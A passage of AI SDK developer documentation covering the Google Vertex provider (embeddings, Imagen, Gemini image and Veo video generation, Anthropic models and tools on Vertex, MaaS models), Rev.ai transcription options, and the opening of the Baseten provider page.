      "category": "HARM_CATEGORY_DANGEROUS_CONTENT",
      "probability": "HIGH",
      "blocked": true,
      "probabilityScore": 0.95422274,
      "severity": "HARM_SEVERITY_MEDIUM",
      "severityScore": 0.43398145
    },
    {
      "category": "HARM_CATEGORY_HARASSMENT",
      "probability": "NEGLIGIBLE",
      "probabilityScore": 0.11085559,
      "severity": "HARM_SEVERITY_NEGLIGIBLE",
      "severityScore": 0.19027223
    },
    {
      "category": "HARM_CATEGORY_SEXUALLY_EXPLICIT",
      "probability": "NEGLIGIBLE",
      "probabilityScore": 0.22901751,
      "severity": "HARM_SEVERITY_NEGLIGIBLE",
      "severityScore": 0.09089675
    }
  ]
}

For more details, see the Google Vertex AI documentation on grounding with Google Search.

Troubleshooting

Schema Limitations

The Google Vertex API uses a subset of the OpenAPI 3.0 schema, which does not support features such as unions. The errors that you get in this case look like this:

GenerateContentRequest.generation_config.response_schema.properties[occupation].type: must be specified

By default, structured outputs are enabled (and for tool calling they are required). You can disable structured outputs for object generation as a workaround:

import { vertex } from '@ai-sdk/google-vertex';
import { type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText, Output } from 'ai';

const result = await generateText({
  model: vertex('gemini-2.5-pro'),
  providerOptions: {
    vertex: {
      structuredOutputs: false,
    } satisfies GoogleLanguageModelOptions,
  },
  output: Output.object({
    schema: z.object({
      name: z.string(),
      age: z.number(),
      contact: z.union([
        z.object({
          type: z.literal('email'),
          value: z.string(),
        }),
        z.object({
          type: z.literal('phone'),
          value: z.string(),
        }),
      ]),
    }),
  }),
  prompt: 'Generate an example person for testing.',
});

The following Zod features are known to not work with Google Vertex:

z.union
z.record

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`gemini-3-pro-preview`
`gemini-2.5-pro`
`gemini-2.5-flash`
`gemini-2.0-flash-001`

Embedding Models

You can create models that call the Google Vertex AI embeddings API using the .embeddingModel() factory method:

const model = vertex.embeddingModel('text-embedding-005');

Google Vertex AI embedding models support additional settings. You can pass them as an options argument:

import {
  vertex,
  type GoogleVertexEmbeddingModelOptions,
} from '@ai-sdk/google-vertex';
import { embed } from 'ai';

const model = vertex.embeddingModel('text-embedding-005');

const { embedding } = await embed({
  model,
  value: 'sunny day at the beach',
  providerOptions: {
    vertex: {
      outputDimensionality: 512, // optional, number of dimensions for the embedding
      taskType: 'SEMANTIC_SIMILARITY', // optional, specifies the task type for generating embeddings
      autoTruncate: false, // optional
    } satisfies GoogleVertexEmbeddingModelOptions,
  },
});

The following optional provider options are available for Google Vertex AI embedding models:

outputDimensionality: number

Optional reduced dimension for the output embedding. If set, excessive values in the output embedding are truncated from the end.
taskType: string

Optional. Specifies the task type for generating embeddings. Supported task types include:
- SEMANTIC_SIMILARITY: Optimized for text similarity.
- CLASSIFICATION: Optimized for text classification.
- CLUSTERING: Optimized for clustering texts based on similarity.
- RETRIEVAL_DOCUMENT: Optimized for document retrieval.
- RETRIEVAL_QUERY: Optimized for query-based retrieval.
- QUESTION_ANSWERING: Optimized for answering questions.
- FACT_VERIFICATION: Optimized for verifying factual information.
- CODE_RETRIEVAL_QUERY: Optimized for retrieving code blocks based on natural language queries.
title: string

Optional. The title of the document being embedded. This helps the model produce better embeddings by providing additional context. Only valid when taskType is set to 'RETRIEVAL_DOCUMENT'.
autoTruncate: boolean

Optional. When set to true, input text will be truncated if it exceeds the maximum length. When set to false, an error is returned if the input text is too long. Defaults to true.

Model Capabilities

Model	Max Values Per Call	Parallel Calls	Multimodal
`text-embedding-005`	2048
`gemini-embedding-2-preview`	2048

Image Models

Imagen Models

Imagen models generate images using the Imagen on Vertex AI API.

import { vertex } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: vertex.image('imagen-4.0-generate-001'),
  prompt: 'A futuristic cityscape at sunset',
  aspectRatio: '16:9',
});

Further configuration can be done using Google Vertex provider options. You can validate the provider options using the GoogleVertexImageModelOptions type.

import { vertex } from '@ai-sdk/google-vertex';
import { GoogleVertexImageModelOptions } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: vertex.image('imagen-4.0-generate-001'),
  providerOptions: {
    vertex: {
      negativePrompt: 'pixelated, blurry, low-quality',
    } satisfies GoogleVertexImageModelOptions,
  },
  // ...
});

The following provider options are available:

negativePrompt string A description of what to discourage in the generated images.
personGeneration allow_adult | allow_all | dont_allow Whether to allow person generation. Defaults to allow_adult.
safetySetting block_low_and_above | block_medium_and_above | block_only_high | block_none Whether to block unsafe content. Defaults to block_medium_and_above.
addWatermark boolean Whether to add an invisible watermark to the generated images. Defaults to true.
storageUri string Cloud Storage URI to store the generated images.

Additional information about the images can be retrieved using Google Vertex meta data.

import { vertex } from '@ai-sdk/google-vertex';
import { GoogleVertexImageModelOptions } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';

const { image, providerMetadata } = await generateImage({
  model: vertex.image('imagen-4.0-generate-001'),
  prompt: 'A futuristic cityscape at sunset',
  aspectRatio: '16:9',
});

console.log(
  `Revised prompt: ${providerMetadata.vertex.images[0].revisedPrompt}`,
);

Image Editing

Google Vertex Imagen models support image editing through inpainting, outpainting, and other edit modes. Pass input images via prompt.images and optionally a mask via prompt.mask.

Inpainting (Insert Objects)

Insert or replace objects in specific areas using a mask:

import { vertex, GoogleVertexImageModelOptions } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';
import fs from 'fs';

const image = fs.readFileSync('./input-image.png');
const mask = fs.readFileSync('./mask.png'); // White = edit area

const { images } = await generateImage({
  model: vertex.image('imagen-3.0-capability-001'),
  prompt: {
    text: 'A sunlit indoor lounge area with a pool containing a flamingo',
    images: [image],
    mask,
  },
  providerOptions: {
    vertex: {
      edit: {
        baseSteps: 50,
        mode: 'EDIT_MODE_INPAINT_INSERTION',
        maskMode: 'MASK_MODE_USER_PROVIDED',
        maskDilation: 0.01,
      },
    } satisfies GoogleVertexImageModelOptions,
  },
});

Outpainting (Extend Image)

Extend an image beyond its original boundaries:

import { vertex, GoogleVertexImageModelOptions } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';
import fs from 'fs';

const image = fs.readFileSync('./input-image.png');
const mask = fs.readFileSync('./outpaint-mask.png'); // White = extend area

const { images } = await generateImage({
  model: vertex.image('imagen-3.0-capability-001'),
  prompt: {
    text: 'Extend the scene with more of the forest background',
    images: [image],
    mask,
  },
  providerOptions: {
    vertex: {
      edit: {
        baseSteps: 50,
        mode: 'EDIT_MODE_OUTPAINT',
        maskMode: 'MASK_MODE_USER_PROVIDED',
      },
    } satisfies GoogleVertexImageModelOptions,
  },
});

Edit Provider Options

The following options are available under providerOptions.vertex.edit:

mode - The edit mode to use:
- EDIT_MODE_INPAINT_INSERTION - Insert objects into masked areas
- EDIT_MODE_INPAINT_REMOVAL - Remove objects from masked areas
- EDIT_MODE_OUTPAINT - Extend image beyond boundaries
- EDIT_MODE_CONTROLLED_EDITING - Controlled editing
- EDIT_MODE_PRODUCT_IMAGE - Product image editing
- EDIT_MODE_BGSWAP - Background swap
baseSteps number - Number of sampling steps (35-75). Higher values = better quality but slower.
maskMode - How to interpret the mask:
- MASK_MODE_USER_PROVIDED - Use the provided mask directly
- MASK_MODE_DEFAULT - Default mask mode
- MASK_MODE_DETECTION_BOX - Mask from detected bounding boxes
- MASK_MODE_CLOTHING_AREA - Mask from clothing segmentation
- MASK_MODE_PARSED_PERSON - Mask from person parsing
maskDilation number - Percentage (0-1) to grow the mask. Recommended: 0.01.

Imagen Model Capabilities

Model	Aspect Ratios
`imagen-3.0-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
`imagen-3.0-generate-002`	1:1, 3:4, 4:3, 9:16, 16:9
`imagen-3.0-fast-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
`imagen-4.0-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
`imagen-4.0-fast-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
`imagen-4.0-ultra-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9

Gemini Image Models

import { vertex } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: vertex.image('gemini-2.5-flash-image'),
  prompt: 'A photorealistic image of a cat wearing a wizard hat',
  aspectRatio: '1:1',
});

Gemini image models also support image editing by providing input images:

import { vertex } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';
import fs from 'node:fs';

const sourceImage = fs.readFileSync('./cat.png');

const { image } = await generateImage({
  model: vertex.image('gemini-2.5-flash-image'),
  prompt: {
    text: 'Add a small wizard hat to this cat',
    images: [sourceImage],
  },
});

You can also use URLs (including gs:// Cloud Storage URIs) for input images:

import { vertex } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: vertex.image('gemini-2.5-flash-image'),
  prompt: {
    text: 'Add a small wizard hat to this cat',
    images: ['https://example.com/cat.png'],
  },
});

Gemini Image Model Capabilities

Model	Image Generation	Image Editing	Aspect Ratios
`gemini-3.1-flash-image-preview`			1:1, 2:3, 3:2, 3:4, 4:3, 4:5, 5:4, 9:16, 16:9, 21:9
`gemini-3-pro-image-preview`			1:1, 2:3, 3:2, 3:4, 4:3, 4:5, 5:4, 9:16, 16:9, 21:9
`gemini-2.5-flash-image`			1:1, 2:3, 3:2, 3:4, 4:3, 4:5, 5:4, 9:16, 16:9, 21:9

Video Models

You can create Veo video models that call the Vertex AI API using the .video() factory method. For more on video generation with the AI SDK see generateVideo().

import { vertex } from '@ai-sdk/google-vertex';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: vertex.video('veo-3.1-generate-001'),
  prompt:
    'A pangolin curled on a mossy stone in a glowing bioluminescent forest',
  aspectRatio: '16:9',
});

You can configure resolution and duration:

import { vertex } from '@ai-sdk/google-vertex';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: vertex.video('veo-3.1-generate-001'),
  prompt: 'A serene mountain landscape at sunset',
  aspectRatio: '16:9',
  resolution: '1920x1080',
  duration: 8,
});

Provider Options

Further configuration can be done using Google Vertex provider options. You can validate the provider options using the GoogleVertexVideoModelOptions type.

import { vertex } from '@ai-sdk/google-vertex';
import { GoogleVertexVideoModelOptions } from '@ai-sdk/google-vertex';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: vertex.video('veo-3.1-generate-001'),
  prompt: 'A serene mountain landscape at sunset',
  aspectRatio: '16:9',
  providerOptions: {
    vertex: {
      generateAudio: true,
      personGeneration: 'allow_adult',
    } satisfies GoogleVertexVideoModelOptions,
  },
});

The following provider options are available:

generateAudio boolean

Whether to generate audio along with the video.
personGeneration 'dont_allow' | 'allow_adult' | 'allow_all'

Whether to allow person generation in the video.
negativePrompt string

A description of what to discourage in the generated video.
gcsOutputDirectory string

Cloud Storage URI to store the generated videos.
referenceImages Array<{ bytesBase64Encoded?: string; gcsUri?: string }>

Reference images for style or asset guidance.
pollIntervalMs number

Polling interval in milliseconds for checking task status.
pollTimeoutMs number

Maximum wait time in milliseconds for video generation.

Model Capabilities

Model	Audio Support
`veo-3.1-generate-001`	Yes
`veo-3.1-fast-generate-001`	Yes
`veo-3.0-generate-001`	Yes
`veo-3.0-fast-generate-001`	Yes
`veo-2.0-generate-001`	No

Google Vertex Anthropic Provider Usage

Provider Instance

You can import the default provider instance vertexAnthropic from @ai-sdk/google-vertex/anthropic:

import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';

If you need a customized setup, you can import createVertexAnthropic from @ai-sdk/google-vertex/anthropic and create a provider instance with your settings:

import { createVertexAnthropic } from '@ai-sdk/google-vertex/anthropic';

const vertexAnthropic = createVertexAnthropic({
  project: 'my-project', // optional
  location: 'us-central1', // optional
});

Node.js Runtime

import { createVertexAnthropic } from '@ai-sdk/google-vertex/anthropic';

const vertexAnthropic = createVertexAnthropic({
  googleAuthOptions: {
    credentials: {
      client_email: 'my-email',
      private_key: 'my-private-key',
    },
  },
});

Optional Provider Settings

You can use the following optional settings to customize the Google Vertex Anthropic provider instance:

project string

The Google Cloud project ID that you want to use for the API calls. It uses the GOOGLE_VERTEX_PROJECT environment variable by default.
location string

The Google Cloud location that you want to use for the API calls, e.g. us-central1. It uses the GOOGLE_VERTEX_LOCATION environment variable by default.
googleAuthOptions object

Optional. The Authentication options used by the Google Auth Library. See also the GoogleAuthOptions interface.
- authClient object An AuthClient to use.
- keyFilename string Path to a .json, .pem, or .p12 key file.
- keyFile string Path to a .json, .pem, or .p12 key file.
- credentials object Object containing client_email and private_key properties, or the external account client options.
- clientOptions object Options object passed to the constructor of the client.
- scopes string | string[] Required scopes for the desired API request.
- projectId string Your project ID.
- universeDomain string The default service domain for a given Cloud universe.
headers Resolvable<Record<string, string | undefined>>

Headers to include in the requests. Can be provided in multiple formats:
- A record of header key-value pairs: Record<string, string | undefined>
- A function that returns headers: () => Record<string, string | undefined>
- An async function that returns headers: async () => Record<string, string | undefined>
- A promise that resolves to headers: Promise<Record<string, string | undefined>>
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Edge Runtime

For Edge runtimes, you can import the provider instance from @ai-sdk/google-vertex/anthropic/edge:

import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic/edge';

To customize the setup, use createVertexAnthropic from the same module:

import { createVertexAnthropic } from '@ai-sdk/google-vertex/anthropic/edge';

const vertexAnthropic = createVertexAnthropic({
  project: 'my-project', // optional
  location: 'us-central1', // optional
});

For Edge runtime authentication, set these environment variables from your Google Default Application Credentials JSON file:

GOOGLE_CLIENT_EMAIL
GOOGLE_PRIVATE_KEY
GOOGLE_PRIVATE_KEY_ID (optional)

Optional Provider Settings

You can use the following optional settings to customize the provider instance:

project string

The Google Cloud project ID that you want to use for the API calls. It uses the GOOGLE_VERTEX_PROJECT environment variable by default.
location string

The Google Cloud location that you want to use for the API calls, e.g. us-central1. It uses the GOOGLE_VERTEX_LOCATION environment variable by default.
googleCredentials object

Optional. The credentials used by the Edge provider for authentication. These credentials are typically set through environment variables and are derived from a service account JSON file.
- clientEmail string The client email from the service account JSON file. Defaults to the contents of the GOOGLE_CLIENT_EMAIL environment variable.
- privateKey string The private key from the service account JSON file. Defaults to the contents of the GOOGLE_PRIVATE_KEY environment variable.
- privateKeyId string The private key ID from the service account JSON file (optional). Defaults to the contents of the GOOGLE_PRIVATE_KEY_ID environment variable.
headers Resolvable<Record<string, string | undefined>>

Headers to include in the requests. Can be provided in multiple formats:
- A record of header key-value pairs: Record<string, string | undefined>
- A function that returns headers: () => Record<string, string | undefined>
- An async function that returns headers: async () => Record<string, string | undefined>
- A promise that resolves to headers: Promise<Record<string, string | undefined>>
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create models that call the Anthropic Messages API using the provider instance. The first argument is the model id, e.g. claude-3-haiku-20240307. Some models have multi-modal capabilities.

const model = anthropic('claude-3-haiku-20240307');

You can use Anthropic language models to generate text with the generateText function:

import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText } from 'ai';

const { text } = await generateText({
  model: vertexAnthropic('claude-3-haiku-20240307'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Anthropic language models can also be used in the streamText function and support structured data generation with Output (see AI SDK Core).

The following optional provider options are available for Anthropic models:

sendReasoning boolean

Optional. Include reasoning content in requests sent to the model. Defaults to true.

If you are experiencing issues with the model handling requests involving reasoning content, you can set this to false to omit them from the request.
thinking object

Optional. See Reasoning section for more details.
metadata object

Optional. Metadata to include with the request. See the Anthropic API documentation for details.
- userId string - An external identifier for the end-user.

Reasoning

Anthropic has reasoning support for the claude-3-7-sonnet@20250219 model.

You can enable it using the thinking provider option and specifying a thinking budget in tokens.

import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText } from 'ai';

const { text, reasoningText, reasoning } = await generateText({
  model: vertexAnthropic('claude-3-7-sonnet@20250219'),
  prompt: 'How many people will live in the world in 2040?',
  providerOptions: {
    anthropic: {
      thinking: { type: 'enabled', budgetTokens: 12000 },
    },
  },
});

console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response

See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.

Cache Control

import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText } from 'ai';

const errorMessage = '... long error message ...';

const result = await generateText({
  model: vertexAnthropic('claude-3-5-sonnet-20240620'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'You are a JavaScript expert.' },
        {
          type: 'text',
          text: `Error message: ${errorMessage}`,
          providerOptions: {
            anthropic: { cacheControl: { type: 'ephemeral' } },
          },
        },
        { type: 'text', text: 'Explain the error message.' },
      ],
    },
  ],
});

console.log(result.text);
console.log('Cache read tokens:', result.usage.inputTokenDetails.cacheReadTokens);
console.log(
  'Cache write tokens:',
  result.usage.inputTokenDetails.cacheWriteTokens,
);

You can also use cache control on system messages by providing multiple system messages at the head of your messages array:

const result = await generateText({
  model: vertexAnthropic('claude-3-5-sonnet-20240620'),
  messages: [
    {
      role: 'system',
      content: 'Cached system message part',
      providerOptions: {
        anthropic: { cacheControl: { type: 'ephemeral' } },
      },
    },
    {
      role: 'system',
      content: 'Uncached system message part',
    },
    {
      role: 'user',
      content: 'User prompt',
    },
  ],
});

For more on prompt caching with Anthropic, see Google Vertex AI's Claude prompt caching documentation and Anthropic's Cache Control documentation.

Tools

Google Vertex Anthropic supports a subset of Anthropic's built-in tools. The following tools are available via the tools property of the provider instance:

Bash Tool: Allows running bash commands.
Text Editor Tool: Provides functionality for viewing and editing text files.
Computer Tool: Enables control of keyboard and mouse actions on a computer.
Web Search Tool: Provides access to real-time web content.

For more background on Anthropic tools, see Anthropic's documentation.

Bash Tool

The Bash Tool allows running bash commands. Here's how to create and use it:

const bashTool = vertexAnthropic.tools.bash_20250124({
  execute: async ({ command, restart }) => {
    // Implement your bash command execution logic here
    // Return the result of the command execution
  },
});

Parameters:

command (string): The bash command to run. Required unless the tool is being restarted.
restart (boolean, optional): Specifying true will restart this tool.

Text Editor Tool

The Text Editor Tool provides functionality for viewing and editing text files:

const textEditorTool = vertexAnthropic.tools.textEditor_20250124({
  execute: async ({
    command,
    path,
    file_text,
    insert_line,
    new_str,
    insert_text,
    old_str,
    view_range,
  }) => {
    // Implement your text editing logic here
    // Return the result of the text editing operation
  },
});

Parameters:

command ('view' | 'create' | 'str_replace' | 'insert' | 'undo_edit'): The command to run. Note: undo_edit is not supported in textEditor_20250429 and textEditor_20250728.
path (string): Absolute path to file or directory, e.g. /repo/file.py or /repo.
file_text (string, optional): Required for create command, with the content of the file to be created.
insert_line (number, optional): Required for insert command. The line number after which to insert the new string.
new_str (string, optional): New string for str_replace command.
insert_text (string, optional): Required for insert command, containing the text to insert.
old_str (string, optional): Required for str_replace command, containing the string to replace.
view_range (number[], optional): Optional for view command to specify line range to show.
max_characters (number, optional): Optional maximum number of characters to view in the file (only available in textEditor_20250728).

Computer Tool

The Computer Tool enables control of keyboard and mouse actions on a computer:

const computerTool = vertexAnthropic.tools.computer_20241022({
  displayWidthPx: 1920,
  displayHeightPx: 1080,
  displayNumber: 0, // Optional, for X11 environments

  execute: async ({ action, coordinate, text }) => {
    // Implement your computer control logic here
    // Return the result of the action

    // Example code:
    switch (action) {
      case 'screenshot': {
        // multipart result:
        return {
          type: 'image',
          data: fs
            .readFileSync('./data/screenshot-editor.png')
            .toString('base64'),
        };
      }
      default: {
        console.log('Action:', action);
        console.log('Coordinate:', coordinate);
        console.log('Text:', text);
        return `executed ${action}`;
      }
    }
  },

  // map to tool result content for LLM consumption:
  toModelOutput({ output }) {
    return typeof output === 'string'
      ? [{ type: 'text', text: output }]
      : [{ type: 'image', data: output.data, mediaType: 'image/png' }];
  },
});

Parameters:

action ('key' | 'type' | 'mouse_move' | 'left_click' | 'left_click_drag' | 'right_click' | 'middle_click' | 'double_click' | 'screenshot' | 'cursor_position'): The action to perform.
coordinate (number[], optional): Required for mouse_move and left_click_drag actions. Specifies the (x, y) coordinates.
text (string, optional): Required for type and key actions.

Web Search Tool

The Web Search Tool provides Claude with direct access to real-time web content:

const webSearchTool = vertexAnthropic.tools.webSearch_20250305({
  maxUses: 5, // Optional: Maximum number of web searches Claude can perform
  allowedDomains: ['example.com'], // Optional: Only search these domains
  blockedDomains: ['spam.com'], // Optional: Never search these domains
  userLocation: {
    // Optional: Provide location for geographically relevant results
    type: 'approximate',
    city: 'San Francisco',
    region: 'CA',
    country: 'US',
    timezone: 'America/Los_Angeles',
  },
});

Parameters:

maxUses (number, optional): Maximum number of web searches Claude can perform during the conversation.
allowedDomains (string[], optional): Optional list of domains that Claude is allowed to search.
blockedDomains (string[], optional): Optional list of domains that Claude should avoid when searching.
userLocation (object, optional): Optional user location information to provide geographically relevant search results.
- type ('approximate'): The type of location (must be approximate).
- city (string, optional): The city name.
- region (string, optional): The region or state.
- country (string, optional): The country.
- timezone (string, optional): The IANA timezone ID.

These tools can be used in conjunction with supported Claude models to enable more complex interactions and tasks.

Model Capabilities

The latest Anthropic model list on Vertex AI is available here. See also Anthropic Model Comparison.

Model	Image Input	Object Generation	Tool Usage	Tool Streaming	Computer Use
`claude-3-7-sonnet@20250219`
`claude-3-5-sonnet-v2@20241022`
`claude-3-5-sonnet@20240620`
`claude-3-5-haiku@20241022`
`claude-3-sonnet@20240229`
`claude-3-haiku@20240307`
`claude-3-opus@20240229`

Google Vertex MaaS Provider Usage

For more information, see the Vertex AI MaaS documentation.

Provider Instance

You can import the default provider instance vertexMaas from @ai-sdk/google-vertex/maas:

import { vertexMaas } from '@ai-sdk/google-vertex/maas';

If you need a customized setup, you can import createVertexMaas from @ai-sdk/google-vertex/maas and create a provider instance with your settings:

import { createVertexMaas } from '@ai-sdk/google-vertex/maas';

const vertexMaas = createVertexMaas({
  project: 'my-project', // optional
  location: 'us-east5', // optional, defaults to 'global'
});

Node.js Runtime

For Node.js environments, the Google Vertex MaaS provider supports all standard Google Cloud authentication options through the google-auth-library:

import { createVertexMaas } from '@ai-sdk/google-vertex/maas';

const vertexMaas = createVertexMaas({
  googleAuthOptions: {
    credentials: {
      client_email: 'my-email',
      private_key: 'my-private-key',
    },
  },
});

Optional Provider Settings

project string

The Google Cloud project ID. Defaults to the GOOGLE_VERTEX_PROJECT environment variable.
location string

The Google Cloud location, e.g. us-east5 or global. Defaults to the GOOGLE_VERTEX_LOCATION environment variable. If not set, defaults to global.
googleAuthOptions object

Optional. The Authentication options used by the Google Auth Library.
headers Resolvable<Record<string, string | undefined>>

Headers to include in requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.

Edge Runtime

For Edge runtimes, import from @ai-sdk/google-vertex/maas/edge:

import { vertexMaas } from '@ai-sdk/google-vertex/maas/edge';

import { createVertexMaas } from '@ai-sdk/google-vertex/maas/edge';

const vertexMaas = createVertexMaas({
  project: 'my-project',
  location: 'us-east5',
});

For Edge runtime authentication, set these environment variables:

GOOGLE_CLIENT_EMAIL
GOOGLE_PRIVATE_KEY
GOOGLE_PRIVATE_KEY_ID (optional)

Language Models

You can create models using the provider instance. The first argument is the model ID:

import { vertexMaas } from '@ai-sdk/google-vertex/maas';
import { generateText } from 'ai';

const { text } = await generateText({
  model: vertexMaas('deepseek-ai/deepseek-v3.2-maas'),
  prompt: 'Invent a new holiday and describe its traditions.',
});

Streaming is also supported:

import { vertexMaas } from '@ai-sdk/google-vertex/maas';
import { streamText } from 'ai';

const result = streamText({
  model: vertexMaas('deepseek-ai/deepseek-v3.2-maas'),
  prompt: 'Invent a new holiday and describe its traditions.',
});

for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}

Available Models

The following models are available through the MaaS provider. You can also pass any valid model ID as a string.

Model ID	Provider
`deepseek-ai/deepseek-r1-0528-maas`	DeepSeek
`deepseek-ai/deepseek-v3.1-maas`	DeepSeek
`deepseek-ai/deepseek-v3.2-maas`	DeepSeek
`openai/gpt-oss-120b-maas`	OpenAI
`openai/gpt-oss-20b-maas`	OpenAI
`meta/llama-4-maverick-17b-128e-instruct-maas`	Meta
`meta/llama-4-scout-17b-16e-instruct-maas`	Meta
`minimax/minimax-m2-maas`	MiniMax
`qwen/qwen3-coder-480b-a35b-instruct-maas`	Qwen
`qwen/qwen3-next-80b-a3b-instruct-maas`	Qwen
`qwen/qwen3-next-80b-a3b-thinking-maas`	Qwen
`moonshotai/kimi-k2-thinking-maas`	Moonshot

title: Rev.ai description: Learn how to use the Rev.ai provider for the AI SDK.

Rev.ai Provider

The Rev.ai provider contains language model support for the Rev.ai transcription API.

Setup

The Rev.ai provider is available in the @ai-sdk/revai module. You can install it with

Provider Instance

You can import the default provider instance revai from @ai-sdk/revai:

import { revai } from '@ai-sdk/revai';

If you need a customized setup, you can import createRevai from @ai-sdk/revai and create a provider instance with your settings:

import { createRevai } from '@ai-sdk/revai';

const revai = createRevai({
  // custom settings, e.g.
  fetch: customFetch,
});

You can use the following optional settings to customize the Rev.ai provider instance:

apiKey string

API key that is being sent using the Authorization header. It defaults to the REVAI_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Transcription Models

You can create models that call the Rev.ai transcription API using the .transcription() factory method.

The first argument is the model id e.g. machine.

const model = revai.transcription('machine');

import { experimental_transcribe as transcribe } from 'ai';
import { revai } from '@ai-sdk/revai';
import { type RevaiTranscriptionModelOptions } from '@ai-sdk/revai';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: revai.transcription('machine'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    revai: { language: 'en' } satisfies RevaiTranscriptionModelOptions,
  },
});

The following provider options are available:

metadata string

Optional metadata string to associate with the transcription job.
notification_config object

Configuration for webhook notifications when job is complete.
- url string - URL to send the notification to.
- auth_headers object - Optional authorization headers for the notification request.
  - Authorization string - Authorization header value.
delete_after_seconds integer

Number of seconds after which the job will be automatically deleted.
verbatim boolean

Whether to include filler words and false starts in the transcription.
rush boolean

[HIPAA Unsupported] Whether to prioritize the job for faster processing. Only available for human transcriber option.
test_mode boolean

Whether to run the job in test mode. Default is false.
segments_to_transcribe Array

Specific segments of the audio to transcribe.
- start number - Start time of the segment in seconds.
- end number - End time of the segment in seconds.
speaker_names Array

Names to assign to speakers in the transcription.
- display_name string - Display name for the speaker.
skip_diarization boolean

Whether to skip speaker diarization. Default is false.
skip_postprocessing boolean

Whether to skip post-processing steps. Only available for English and Spanish languages. Default is false.
skip_punctuation boolean

Whether to skip adding punctuation to the transcription. Default is false.
remove_disfluencies boolean

Whether to remove disfluencies (um, uh, etc.) from the transcription. Default is false.
remove_atmospherics boolean

Whether to remove atmospheric sounds (like <laugh>, <affirmative>) from the transcription. Default is false.
filter_profanity boolean

Whether to filter profanity from the transcription by replacing characters with asterisks except for the first and last. Default is false.
speaker_channels_count integer

Number of speaker channels in the audio. Only available for English, Spanish and French languages.
speakers_count integer

Expected number of speakers in the audio. Only available for English, Spanish and French languages.
diarization_type string

Type of diarization to use. Possible values: "standard" (default), "premium".
custom_vocabulary_id string

ID of a custom vocabulary to use for the transcription, submitted through the Custom Vocabularies API.
custom_vocabularies Array

Custom vocabularies to use for the transcription.
strict_custom_vocabulary boolean

Whether to strictly enforce custom vocabulary.
summarization_config object

Configuration for generating a summary of the transcription.
- model string - Model to use for summarization. Possible values: "standard" (default), "premium".
- type string - Format of the summary. Possible values: "paragraph" (default), "bullets".
- prompt string - Custom prompt for the summarization (mutually exclusive with type).
translation_config object

Configuration for translating the transcription.
- target_languages Array - Target languages for translation. Each item is an object with:
  - language string - Language code. Possible values: "en", "en-us", "en-gb", "ar", "pt", "pt-br", "pt-pt", "fr", "fr-ca", "es", "es-es", "es-la", "it", "ja", "ko", "de", "ru".
- model string - Model to use for translation. Possible values: "standard" (default), "premium".
language string

Language of the audio content, provided as an ISO 639-1 language code. Default is "en".
forced_alignment boolean

Whether to perform forced alignment, which provides improved accuracy for per-word timestamps. Default is false.

Currently supported languages:
- English (en, en-us, en-gb)
- French (fr)
- Italian (it)
- German (de)
- Spanish (es)
Note: This option is not available in low-cost environments.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`machine`
`low_cost`
`fusion`

title: Baseten description: Learn how to use Baseten models with the AI SDK.

Baseten Provider

Baseten is an inference platform for serving frontier, enterprise-grade opensource AI models via their API.

Setup

The Baseten provider is available via the @ai-sdk/baseten module. You can install it with

Provider Instance

You can import the default provider instance baseten from @ai-sdk/baseten:

import { baseten } from '@ai-sdk/baseten';

If you need a customized setup, you can import createBaseten from @ai-sdk/baseten and create a provider instance with your settings:

import { createBaseten } from '@ai-sdk/baseten';

const baseten = createBaseten({
  apiKey: process.env.BASETEN_API_KEY ?? '',
});

You can use the following optional settings to customize the Baseten provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://inference.baseten.co/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the BASETEN_API_KEY environment variable. It is recommended you set the environment variable using export so you do not need to include the field every time. You can grab your Baseten API Key here
modelURL string

Custom model URL for specific models (chat or embeddings). If not provided, the default Model APIs will be used.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.

Model APIs

